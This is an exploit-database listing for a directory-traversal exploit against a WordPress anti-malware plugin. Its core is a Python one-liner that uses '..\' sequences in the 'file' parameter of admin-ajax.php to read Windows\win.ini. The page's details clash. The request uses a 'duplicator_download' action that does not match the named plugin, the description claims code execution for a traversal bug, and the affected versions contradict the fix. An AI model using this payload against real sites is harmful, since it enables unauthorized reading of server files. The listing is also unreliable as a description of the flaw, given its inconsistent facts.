header-logo
Suggest Exploit
vendor:
Anti-Malware Security and Bruteforce Firewall
by:
TheSmuggler
9,8
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: Anti-Malware Security and Bruteforce Firewall
Affected Version From: <= 4.20.59
Affected Version To: <= 4.20.72
Patch Exists: YES
Related CWE: N/A
CPE: a:gotmls:anti-malware_security_and_bruteforce_firewall
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2021

WordPress Plugin Anti-Malware Security and Bruteforce Firewall 4.20.59 – Directory Traversal

The vulnerability exists due to insufficient validation of user-supplied input in the 'file' parameter of the 'admin-ajax.php' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary code on the target system. Successful exploitation of this vulnerability may result in unauthorized access to sensitive information.

Mitigation:

Update to version 4.20.72 or later.
Source

Exploit-DB raw data:

# Exploit Title: WordPress Plugin Anti-Malware Security and Bruteforce Firewall 4.20.59 - Directory Traversal
# Date: 05.07.2021
# Exploit Author: TheSmuggler
# Vendor Homepage: https://gotmls.net/
# Software Link: https://gotmls.net/downloads/
# Version: <= 4.20.72
# Tested on: Windows

import requests

print(requests.get("http://127.0.0.1/wp-admin/admin-ajax.php?action=duplicator_download&file=..\..\..\..\..\..\..\..\..\Windows\win.ini", headers={"User-Agent":"Chrome"}).text)

Navigation

Suggest Exploit

Services By CQR